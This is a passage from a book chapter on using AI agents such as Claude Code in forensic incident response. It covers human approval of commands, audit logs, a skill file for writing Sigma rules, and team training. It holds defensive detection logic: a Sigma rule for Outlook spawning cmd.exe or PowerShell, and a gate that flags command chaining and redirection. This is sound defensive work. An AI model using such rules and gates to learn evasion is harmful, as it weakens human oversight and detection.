This approach helps to limit hallucinations that would otherwise contaminate the evidence analysis results. The AI cannot fabricate registry keys or invent timeline entries because it only works with output from deterministic parsing tools.

Human in the Loop (HITL)

Protocol SIFT implements mandatory human checkpoints for critical operations. By default, the system operates in read-only mode and prompts analysts for permission before executing any command that could alter the system or evidence.

Before running commands, Protocol SIFT displays the exact syntax it will execute and asks for approval. This visibility allows analysts to verify correctness and maintain audit trails showing which commands were executed and when approval was granted.

Analysts can configure allowlists for common read-only tools like fls, icat, or exiftool to streamline workflows without compromising control. Commands that write data, modify files, or alter system state always require explicit approval.
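The decision logic for such a gate can be sketched in Python as follows; the allowlist contents and rules are illustrative, since actual tool allowlisting is handled by the agent platform's permission configuration:

```python
import shlex

# Analyst-configured read-only tools that may run without a prompt (illustrative).
READ_ONLY_ALLOWLIST = {"fls", "icat", "exiftool", "strings"}

def requires_approval(command: str) -> bool:
    """Return True when a generated command must be shown to the analyst first."""
    try:
        argv = shlex.split(command)
    except ValueError:
        return True  # unparseable commands (e.g., unbalanced quotes) need review
    if not argv:
        return True  # empty input is never auto-approved
    if any(tok in (">", ">>", "|", ";", "&&") for tok in argv):
        return True  # redirection or chaining may write data or hide commands
    return argv[0] not in READ_ONLY_ALLOWLIST
```

The conservative default (anything unrecognized requires approval) mirrors the read-only-by-default posture described above.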

Forensically Sound Tools

Protocol SIFT orchestrates only well-established, vetted forensic utilities included in the SIFT Workstation. Tools like The Sleuth Kit, the Volatility Framework, and Eric Zimmerman’s utilities have established track records in legal proceedings and undergo continuous community validation.

When Protocol SIFT generates a timeline, the timeline comes from log2timeline.py, not from AI interpretation. When parsing registry hives, RECmd performs the actual parsing. The AI determines which tools to run and in what order, but evidence generation remains the domain of trusted deterministic utilities.

This architecture ensures that findings can be reproduced by running the same commands manually, maintaining forensic defensibility while gaining the benefits of automation.

Auditability and Documentation

All Protocol SIFT operations generate detailed audit logs documenting the investigative workflow. Logs capture the model version, analyst prompts, generated commands, tool output, and approval decisions. This documentation supports legal review and allows reconstruction of the analytical process.

Investigators can demonstrate exactly which tools were invoked, what parameters were used, and how conclusions were derived from tool output. This transparency addresses judicial concerns about AI involvement in evidence analysis.

For example, in our earlier investigation of the Windows system using VMware virtual disk evidence, the audit log captured every command Claude Code generated, the analyst approvals granted, and the output from each tool in the ~/.claude/projects directory tree. JSON files capture each step of the ReAct reasoning process, allowing reviewers to trace how the model arrived at each decision. An example of an audit log entry is included in Listing 17, with the tool output also captured alongside the logging entry.

Listing 17. Claude Code Audit Log Example
"message": {
  "model": "claude-opus-4-5-20251101",
  "content": [
    {
      "type": "thinking",
      "thinking": "Found Windows event logs. There's also a procmon.png on the desktop which could be a screenshot of process monitor showing malicious activity. Let me:\n1. View the procmon.png\n2. Check the live Windows event logs\n3. Look for PowerShell history\n4. Use hayabusa to analyze the event logs",
    } (1)
  ],
},
// [...] omitted for brevity
"message": {
  "model": "claude-opus-4-5-20251101",
  "content": [
    {
      "type": "tool_use",
      "id": "toolu_01LHyUN5JiNoGc4PnCkKqiYQ",
      "name": "Bash",
      "input": {
        "command": "find /mnt/windows/Users/Sec504 -name \"*PowerShell*\" -o -name \"*history*\" -o -name \"ConsoleHost_history.txt\" 2>/dev/null", (2)
        "description": "Find PowerShell history files"
      }
    }
  ],
}
1 JSONL output edited for brevity.
2 Example command generated by Claude Code to locate PowerShell history files.
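Because these transcripts are JSONL, extracting an audit trail of executed commands is straightforward to script. The Python sketch below mirrors the record layout in the excerpt above; any field names beyond those shown are assumptions:

```python
import json
from pathlib import Path

def extract_tool_calls(transcript: Path) -> list:
    """Collect every Bash tool command from a Claude Code JSONL transcript.

    Sketch based on the record layout shown in Listing 17; each JSONL line is
    expected to hold a JSON object with an optional message.content list.
    """
    calls = []
    for line in transcript.read_text().splitlines():
        if not line.strip():
            continue
        record = json.loads(line)
        content = record.get("message", {}).get("content", [])
        for item in content if isinstance(content, list) else []:
            if isinstance(item, dict) and item.get("type") == "tool_use":
                calls.append(item.get("input", {}).get("command"))
    return calls
```

A script like this lets reviewers tabulate every command the agent ran without reading raw JSONL by hand.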

These trust mechanisms work together to enable analysts to leverage autonomous operation while meeting forensic soundness requirements. Analysts gain speed and scale advantages without sacrificing the auditability, verification, and reproducibility essential for legal proceedings.

Operational Considerations

Effective AI integration into incident response requires attention to verification practices, documentation standards, and ongoing skill development. In this section, we’ll examine how these factors shape the practical use of AI in forensic workflows.

Verification and Trust

AI output requires verification before action or documentation as factual conclusions. This principle applies regardless of how confident or authoritative the AI response appears.

Verification approaches vary by use case. Log analysis verification requires manually confirming that identified patterns exist in source data. If AI claims to detect beaconing behavior at five-minute intervals, analysts should examine the timestamps directly to verify this pattern is present. Timing calculations should be confirmed since models sometimes struggle with precise numerical reasoning. Pattern identification is a hypothesis that requires evidence-based confirmation.
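A claimed beacon cadence is a good example of a check worth scripting. The Python sketch below computes inter-arrival gaps from raw timestamps and reports what fraction fall within a tolerance of the claimed interval; the tolerance value is illustrative:

```python
from datetime import datetime, timedelta

def check_beacon_interval(timestamps, expected, tolerance=timedelta(seconds=30)):
    """Return the fraction of inter-arrival gaps within tolerance of expected.

    A value near 1.0 supports the claimed cadence; a low value suggests the
    AI-reported pattern does not hold in the source data.
    """
    ts = sorted(timestamps)
    gaps = [b - a for a, b in zip(ts, ts[1:])]
    if not gaps:
        return 0.0
    close = sum(1 for g in gaps if abs(g - expected) <= tolerance)
    return close / len(gaps)

# Usage: check_beacon_interval(event_times, expected=timedelta(minutes=5))
```

This turns "AI claims five-minute beaconing" into a measurable, documentable verification step rather than a judgment call.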

Report drafts generated by AI should have every factual claim checked against source evidence. Quotes and statistics, in particular, require verification, since models may alter wording or combine statistics from different contexts. An AI-generated executive summary should preserve the accuracy of technical findings while changing only presentation style and technical depth.

Playbooks generated by AI should be tested where possible before operational use. Subject matter experts should review the technical accuracy of procedures, commands, and tool references. An untested AI-generated playbook may contain syntactically incorrect commands, reference nonexistent features, or recommend procedures inappropriate for the organizational environment.

Documentation should capture verification performed for significant findings. Stating "AI-assisted analysis identified X, verified by [manual review/testing/SME confirmation]" maintains transparency about how conclusions were reached. This transparency supports both immediate trust in findings and future review if conclusions are questioned.

Documentation Practices

When AI assists in analysis, documentation should reflect this contribution and the verification performed.

Incident documentation should note when AI tools were used and for what purpose. This notation allows reviewers to distinguish which findings resulted from AI assistance and which from traditional analysis methods. For example, "Code analysis performed using AI-assisted deobfuscation, findings verified through execution in an isolated environment" provides clear provenance for the document audience.

Verification steps for AI-generated findings should be documented with the same rigor as for any analytical tool output. When AI identifies a pattern in log data, documentation should state "Pattern identified by AI analysis, manually confirmed in logs from [timestamp range]." This documentation supports challenges to findings by making the verification basis explicit.

AI interaction logs should be preserved where they contributed to significant conclusions. These logs serve as a record of analytical reasoning similar to analyst notes from manual investigation. If an AI conversation reveals a critical insight into malware functionality, it should be retained as part of the investigation record.

Review the documentation for your AI platform to understand the available logging and export options. Several platforms provide conversation export features that facilitate record-keeping, or agent frameworks may log interactions automatically (such as Claude Code, which stores project histories in local files as discussed in Section 1.5.2.4).

Documentation should distinguish between AI-suggested hypotheses and verified findings. AI might suggest that observed behavior indicates data exfiltration based on network traffic volume, but this hypothesis requires confirmation through detailed traffic analysis. Documenting which claims are AI hypotheses and which are verified findings prevents confusion during review or legal proceedings.

This documentation approach supports three critical needs: reproducibility, defensibility, and continuous improvement.

  • Reproducibility allows others to understand how conclusions were reached, following the analytical path from evidence through AI assistance to verified findings.

  • Defensibility ensures that if findings are challenged, the basis and verification are clear rather than relying on assertions about AI capabilities.

  • Continuous improvement is possible by reviewing AI-assisted work to refine prompts and identify where AI adds value and where traditional methods remain superior.

Documentation is seldom a favorite task for analysts, but maintaining high standards in how we build documentation is essential for defensible, trustworthy incident response.

Building Organizational Capability

AI integration benefits from deliberate skill development and consistent deployment throughout the organization, rather than ad hoc adoption. At the time of this writing, using AI models for incident response is still a relatively new practice, and few organizations have mature processes for consistent AI use in their incident response process. While one analyst can significantly accelerate their work through AI assistance, the benefits compound when team members share effective practices and build collective capability across the organization.

In this section, we’ll explore several practices that help organizations leverage AI for incident response across the team for greater impact.

Prompt Libraries

Teams should develop and maintain collections of effective prompts for common tasks. When an analyst creates a prompt that consistently produces useful results, it becomes a reusable asset. Successful prompts should be shared across the team, reducing duplication of effort and accelerating capability for analysts who have not yet developed equivalent prompts.

Sharing prompts accelerates team capability by giving less experienced analysts both starting points and inspiration for further refinement. For example, a prompt that effectively guides AI-assisted malware code analysis can serve as a template that other analysts adapt for different malware families or analysis contexts, while also demonstrating how to structure prompts for better results.

Skill Files and Prompt Library Integration

Prompt libraries can be stored in shared documents, wikis, or version-controlled repositories, but they are adopted more readily when embedded in AI platforms that support custom prompt templates. Skill files are commonly used in Claude Code, OpenAI Codex, and Gemini CLI to define reusable prompt structures that analysts can select when initiating new analysis tasks. By embedding prompts into the AI platform, organizations reduce the friction analysts face when accessing effective prompts, increasing the likelihood of consistent use.

For my Claude Code environment, I maintain several skills for specific tasks that I reuse frequently. For example, I have a Sigma detection rule generation skill that creates Sigma rules from analyst descriptions of observed behavior, as shown in Listing 18.

Listing 18. Claude Code Skill File Example
$ pwd
/Users/jwright/forensics
$ cat .claude/commands/sigma.md
---
description: Generate Sigma detection rules from attack descriptions or observed artifacts
---

Generate Sigma detection rules from analyst input: behavior descriptions, observed artifacts, or MITRE ATT&CK technique references.

## Process

1. **Parse input** to identify log source, detection fields, and attack context
2. **Map to log source** using the table below
3. **Build detection logic** with selection criteria, optional filters, and condition
4. **Generate complete YAML** with metadata, tags, and false positive notes
5. **Provide context** including conversion commands for target SIEMs

Use defaults when not specified: status `experimental`, level `medium`, author `Falsimentis IR Team`.

## Log Source Reference

| Behavior | Product | Category |
|----------|---------|----------|
| Process execution | windows | process_creation |
| PowerShell | windows | ps_script |
| File events | windows | file_event |
| Registry | windows | registry_event |
| Network | windows | network_connection |
| Linux processes | linux | process_creation |
| AWS | aws | cloudtrail |

## Output Template

```yaml
title: <Descriptive title>
id: <UUID>
status: experimental
description: <Detection purpose>
references:
    - <MITRE ATT&CK or relevant URL>
author: IR Team
date: YYYY/MM/DD
tags:
    - attack.<tactic>
    - attack.<technique_id>
logsource:
    product: <product>
    category: <category>
detection:
    selection:
        <field>: <value>
    condition: selection
falsepositives:
    - <Legitimate scenarios>
level: medium
```

## Example

**Input**: `/sigma outlook.exe spawning cmd.exe or powershell.exe`

```yaml
title: Email Client Spawning Command Shell
id: a1b2c3d4-e5f6-7890-abcd-ef1234567890
status: experimental
description: Detects Outlook spawning command interpreters, indicating possible malicious attachment execution.
references:
    - https://attack.mitre.org/techniques/T1204/002/
author: IR Team
date: 2025/01/24
tags:
    - attack.execution
    - attack.t1204.002
logsource:
    product: windows
    category: process_creation
detection:
    selection_parent:
        ParentImage|endswith: '\outlook.exe'
    selection_child:
        Image|endswith:
            - '\cmd.exe'
            - '\powershell.exe'
    condition: selection_parent and selection_child
falsepositives:
    - Legitimate Outlook add-ins
level: high
```
This skill is available at https://urls.sec504.org/sigmaskill.

When I need to create a new Sigma rule, I can invoke this skill using the /sigma command (matching the skill Markdown file name) and supply the context for the desired Sigma rule:

/sigma Process created cmd.exe spawning from outlook.exe with command line containing "http"

The model then generates a complete Sigma rule based on the input, as shown in Figure 36.

Claude Code generating a Sigma detection rule for Outlook spawning cmd.exe with HTTP URLs in the command line
Figure 36. Claude Code Sigma Rule Generation Example

Sharing and reusing effective prompts through prompt libraries and skill files accelerates team capability and promotes consistent AI usage across the organization. When the organization reduces the friction of adoption and consistent use, analysts are more likely to integrate AI assistance into their workflows regularly.

Use Case Documentation

Documentation, distributed internally, should capture which AI applications have proven valuable in your specific organizational environment and which have not worked well. Not every AI use case succeeds in every context. Recording what worked (and what did not) helps teams focus effort on high-value applications rather than repeatedly attempting approaches that have already proven ineffective. This documentation also helps new team members quickly understand organizational AI practices.

Training

Team members should understand both the capabilities and limitations of AI tools through structured training rather than relying solely on informal experimentation. Practical exercises build intuition for effective use. Training scenarios might include analyzing malware samples with AI assistance, generating incident reports from investigation notes, or troubleshooting common prompt issues. Hands-on practice reveals where AI adds value and where traditional methods remain superior.

Structured Learning Paths

Effective AI training follows a progressive structure that builds skills incrementally, a learning theory known as scaffolding. Initial training should cover fundamental concepts: how large language models work, common failure modes like hallucination, and basic prompt construction techniques. Intermediate training introduces domain-specific applications such as log analysis, code review, and report generation. Advanced training addresses complex scenarios, including multi-step analysis chains, API integration, and prompt optimization for specialized tasks.

Organizations should not assume that general AI familiarity translates into effective security applications. An analyst who uses AI for personal productivity may still struggle to apply it effectively to malware analysis or threat intelligence synthesis. Security-specific training bridges this gap by demonstrating how AI capabilities map to incident response workflows.

Practical Training Exercises

Hands-on exercises often provide the fastest route to effective learning. Consider the training scenarios organized by skill level as shown in Table 7. These exercises cover foundational, intermediate, and advanced skills, helping analysts build confidence progressively.

These exercises work well in a lab environment where analysts can experiment without the pressure of production time.
Table 7. Suggested Training Exercises for AI-Assisted Incident Response
| Level | Exercise |
|-------|----------|
| Foundational | Provide analysts with a simple obfuscated script and have them develop prompts that successfully decode it, comparing different prompt approaches and their results |
| Foundational | Give analysts a set of log entries containing an obvious attack pattern and have them craft prompts that identify the malicious activity |
| Foundational | Have analysts generate an executive summary from a provided technical incident report, then critique the AI output for accuracy and completeness |
| Intermediate | Present a more complex malware sample requiring multi-stage analysis, where analysts practice breaking the problem into sequential prompts |
| Intermediate | Provide sanitized case notes from a real incident and have analysts generate a draft incident report, then compare results across the team |
| Intermediate | Have analysts create detection rules from threat intelligence reports, verifying the rules against known-good and known-bad samples |
| Advanced | Challenge analysts to analyze an unfamiliar log format, developing prompts that help them understand the structure and identify anomalies |
| Advanced | Present a scenario requiring integration of multiple data sources (logs, network captures, memory artifacts) and have analysts develop an analysis workflow using AI assistance at appropriate stages |
| Advanced | Have analysts attempt to make AI produce incorrect analysis through adversarial prompting, building intuition for verification requirements |
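The intermediate exercise on verifying detection rules can be prototyped without a full SIEM. The sketch below is a simplified stand-in for a real Sigma evaluation engine (such as pySigma, which would be used in practice); the field names assume Sysmon-style process-creation events, and the logic mirrors the Outlook-spawns-shell rule shown earlier:

```python
# Simplified stand-in for a Sigma engine: evaluates the
# Outlook-spawns-shell detection logic against sample events.
def matches(event: dict) -> bool:
    """Return True if the event matches the detection logic."""
    parent_ok = event.get("ParentImage", "").lower().endswith("\\outlook.exe")
    child_ok = any(
        event.get("Image", "").lower().endswith(suffix)
        for suffix in ("\\cmd.exe", "\\powershell.exe")
    )
    return parent_ok and child_ok

# Known-bad sample: Outlook spawning PowerShell (should match)
bad = {
    "ParentImage": r"C:\Program Files\Microsoft Office\OUTLOOK.EXE",
    "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
}

# Known-good sample: Explorer launching Outlook (should not match)
good = {
    "ParentImage": r"C:\Windows\explorer.exe",
    "Image": r"C:\Program Files\Microsoft Office\OUTLOOK.EXE",
}

assert matches(bad) is True
assert matches(good) is False
print("rule logic verified against known-good and known-bad samples")
```

Running the rule logic against both sample sets before deployment catches inverted conditions and field-name mistakes that otherwise surface as silent detection gaps in production.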

Cross-Training Considerations

AI training should not be isolated to a specialized AI team. When only certain analysts understand AI capabilities, the organization cannot leverage these tools consistently across all incidents. Cross-training ensures that AI assistance is available regardless of which analyst is assigned to a case.

Consider pairing experienced AI users with analysts who are developing their skills. This mentorship approach accelerates learning while distributing knowledge across the team. Senior analysts can share effective prompts, demonstrate troubleshooting techniques, and help newer team members develop intuition for when AI assistance adds value.

Technical understanding of AI models is important, but equally critical is cultivating the creativity and the openness to experimentation and failure that drive learning.

Structured AI training improves the organization’s overall incident response capability. Teams that build systematic training programs develop consistent, reliable AI practices rather than depending on individual experimentation that may or may not transfer to other analysts. By investing in the consistent adoption of AI tools, organizations position themselves to benefit from accelerating capabilities across the team rather than being limited to a few early adopters.

Looking Forward

Generative AI capabilities continue to evolve rapidly. The specific techniques described in this chapter reflect current best practices, but those practices will develop as models improve and integration options continue to expand.

Several trends merit attention as organizations plan AI integration strategies. First, models are becoming more capable at complex, multi-step analysis. Tasks that currently require careful prompting may become straightforward as reasoning capabilities continue to improve. Analysts should periodically revisit prompts that require extensive structure to determine whether simpler approaches now produce equivalent results.

Agent tool integration standards, such as MCP, are maturing, making AI integration with security tools more accessible. Broader platform support and easier deployment will reduce the implementation burden for MCP-connected workflows, and commercial solutions that embed AI capabilities into existing security platforms will continue to emerge. Organizations currently unable to justify custom integration development may find that turnkey options become available as the ecosystem matures.

Security-focused models trained specifically for cybersecurity tasks may offer improved performance for incident response applications. Specialized models such as Cisco’s Foundation-sec-8b are purpose-built to understand cybersecurity language and workflows, with claims of reduced hallucination and improved performance on security benchmarks compared to general-purpose models of similar size. [13] These small language models (SLMs) may provide cost-effective alternatives to large general-purpose models for specific security tasks in minimally resourced local hosting environments, with the trade-off of reduced versatility outside their training domain.

The fundamental principles, however, remain stable:

  • AI accelerates analysis but does not replace human judgment.

  • Verification remains essential regardless of model capability.

  • Organizational policies should govern what data can be shared with AI platforms.

  • Documentation should reflect how conclusions were reached.

Attackers are adopting AI to accelerate their operations. Defenders who leverage AI effectively can maintain or improve response times despite increasing attack sophistication. The goal is to identify practical AI applications that reduce the time and effort required to protect organizational assets.

Analysts who develop fluency with AI tools, understanding both their capabilities and limitations, will be increasingly valuable as these technologies become standard elements of security operations. The competitive advantage goes not to teams that adopt AI first, but to teams that integrate AI thoughtfully while maintaining the verification rigor and analytical skepticism that separate good incident response from performance theater. Experimentation, practice, and continuous learning position teams to leverage AI effectively as capabilities continue to advance.


1. Anthropic, "Updates to our Consumer Terms," www.anthropic.com/news/updates-to-our-consumer-terms
2. Narayanan, A., & Shmatikov, V., "How to Break Anonymity of the Netflix Prize Dataset," arXiv preprint arXiv:cs/0610105, October 2006, arxiv.org/abs/cs/0610105
3. Incident Response Playbook Generation Structured Prompt, gist.github.com/joswr1ght/e3902b170b08396fd2b4c46500a56498
4. Hague, Sebastian, "A step-by-step guide to writing incident response reports," Hack The Box, www.hackthebox.com/blog/writing-incident-response-report-template
5. Zeltser, Lenny, "Good IR Reports with AI," zeltser.com/good-ir-reports-with-ai
6. Hague, Sebastian, "A step-by-step guide to writing incident response reports," Hack The Box, www.hackthebox.com/blog/writing-incident-response-report-template
7. Twine - An open-source tool for telling interactive, nonlinear stories, twinery.org/
8. Anthropic, "Disrupting the first reported AI-orchestrated cyber espionage campaign," November 2025, www.anthropic.com/news/disrupting-AI-espionage
9. Anthropic, "Disrupting the first reported AI-orchestrated cyber espionage campaign" (PDF report), November 2025, assets.anthropic.com/m/ec212e6566a0d47/original/Disrupting-the-first-reported-AI-orchestrated-cyber-espionage-campaign.pdf
10. Janssen, Jan-Keno, "Autonomous AI Cyberattack: Doubts about Anthropic’s Investigation," Heise Online, November 2025, www.heise.de/en/news/Autonomous-AI-Cyberattack-Doubts-about-Anthropic-s-Investigation-11080298.html
11. Yao, Shunyu et al., "ReAct: Synergizing Reasoning and Acting in Language Models," ICLR 2023, openreview.net/forum?id=WE_vluYUL-X
12. RECmd - Registry Explorer Command Line Tool, github.com/EricZimmerman/RECmd
13. Singer, Yaron, "Foundation-sec-8b: Cisco Foundation AI’s First Open-Source Security Model," Cisco Blogs, April 2025, blogs.cisco.com/security/foundation-sec-cisco-foundation-ai-first-open-source-security-model